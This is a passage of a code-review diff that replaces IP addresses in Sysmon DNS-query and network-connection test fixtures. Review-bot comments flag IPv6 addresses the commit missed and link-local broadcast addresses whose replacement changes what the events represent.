03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:172.217.12.195;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, 
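Review bot: The new `QueryResults` value still carries the public IPv6 nameserver addresses `2001:503:a83e::2:30`, `2001:503:231d::2:30`, `2001:503:83eb::30` and `2001:500:856e::30`, while the IPv4 entries next to them were moved into 192.168.0.0/16; the parsed copy in the hunk at 3202 has the same leftovers. If the goal of the commit is that every literal IP in test data falls inside the supported subset, these were missed, and a validator that scans IPv6 literals inside strings would presumably still reject the file. Either replace them with an address from the same allowed range used elsewhere in this change (the `2a02:cf40:...` value) or, if IPv6 is intentionally out of scope, say so in the commit description so the next reader does not assume they were overlooked.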
@@ -3202,7 +3202,7 @@
 "ProcessId": "2736",
 "QueryName": "ocsp.pki.goog",
 "QueryStatus": "0",
- "QueryResults": "type: 5 pki-goog.l.google.com;::ffff:172.217.12.195;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "type: 5 pki-goog.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.581"
 },
@@ -3280,7 +3280,7 @@
 "ProcessId": "2736",
 "QueryName": "googleads4.g.doubleclick.net",
 "QueryStatus": "0",
- "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;",
+ "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.872",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -3301,7 +3301,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3382,7 +3382,7 @@ "ProcessId": "2736", "QueryName": "images.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:151.101.2.2;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;", + "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -3401,7 +3401,7 @@ "version": 5 }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.2.2;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -3463,7 +3463,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:4300:6800:7200:6f00:6d00:6500\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "code": "3",
 "kind": "event",
 "provider": "Microsoft-Windows-Sysmon"
@@ -3485,12 +3485,12 @@
 "UtcTime": "2019-03-18 16:57:48.250",
 "User": "NT AUTHORITY\\NETWORK SERVICE",
 "Image": "C:\\Windows\\System32\\svchost.exe",
- "SourceIp": "a00:20f:0:0:18a2:6e00:e0:ffff",
+ "SourceIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "DestinationPort": "5355",
 "DestinationPortName": "llmnr",
 "ProcessGuid": "{42f11c3b-0bad-5c8c-0000-0010dfbc0000}",
 "ProcessId": "924",
- "DestinationIp": "e000:fc:4300:6800:7200:6f00:6d00:6500",
+ "DestinationIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "SourceIsIpv6": "true",
 "SourcePort": "55542",
 "Initiated": "true",
@@ -3512,7 +3512,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData 
Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "code": "3",
 "kind": "event"
@@ -3541,10 +3541,10 @@
 "SourceIsIpv6": "false",
 "DestinationIsIpv6": "false",
 "ProcessId": "4",
- "DestinationIp": "169.254.255.255",
+ "DestinationIp": "89.160.20.156",
 "ProcessGuid": "{42f11c3b-6e19-5c8c-0000-0010eb030000}",
 "Initiated": "true",
- "SourceIp": "169.254.180.25",
+ "SourceIp": "89.160.20.156",
 "SourcePort": "137",
 "SourcePortName": "netbios-ns",
 "DestinationPort": "137"
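Review bot: The addresses replaced in the hunk at 3541 (and in the raw XML at 3512) were not public to begin with: `169.254.180.25` is link-local and `169.254.255.255` is the link-local broadcast that a NetBIOS name-service query (port 137) is actually sent to, so swapping them for a public unicast address changes what this event represents rather than just sanitising it. If the pipeline derives anything from the address class (for example a `network.direction` or internal/external classification; I cannot see the pipeline from this diff), the fixture no longer exercises the broadcast/link-local path it used to. If the IP validator really rejects 169.254.0.0/16, a private address such as `"DestinationIp": "192.168.255.255"` with `"SourceIp": "192.168.180.25"` (constructed example) would keep the broadcast-to-directed-query shape; otherwise restoring the original values is the smaller change.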
@@ -3564,7 +3564,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData 
Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "code": "3"
 },
 "winlog": {
@@ -3586,8 +3586,8 @@
 "ProcessId": "4",
 "Initiated": "false",
 "User": "NT AUTHORITY\\SYSTEM",
- "SourceIp": "169.254.255.255",
- "DestinationIp": "169.254.180.25",
+ "SourceIp": "89.160.20.156",
+ "DestinationIp": "89.160.20.156",
 "DestinationPort": "137",
 "Image": "System",
 "Protocol": "udp",
@@ -3680,10 +3680,10 @@
 "User": "NT AUTHORITY\\NETWORK SERVICE",
 "Initiated": "true",
 "DestinationIsIpv6": "true",
- "DestinationIp": "e000:fc:0:0:0:0:0:0",
+ "DestinationIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "DestinationPortName": "llmnr",
 "ProcessGuid": "{42f11c3b-0bad-5c8c-0000-0010dfbc0000}",
- "SourceIp": "a9fe:b419:0:0:f880:2301:e0:ffff",
+ "SourceIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "UtcTime": "2019-03-18 16:57:48.251",
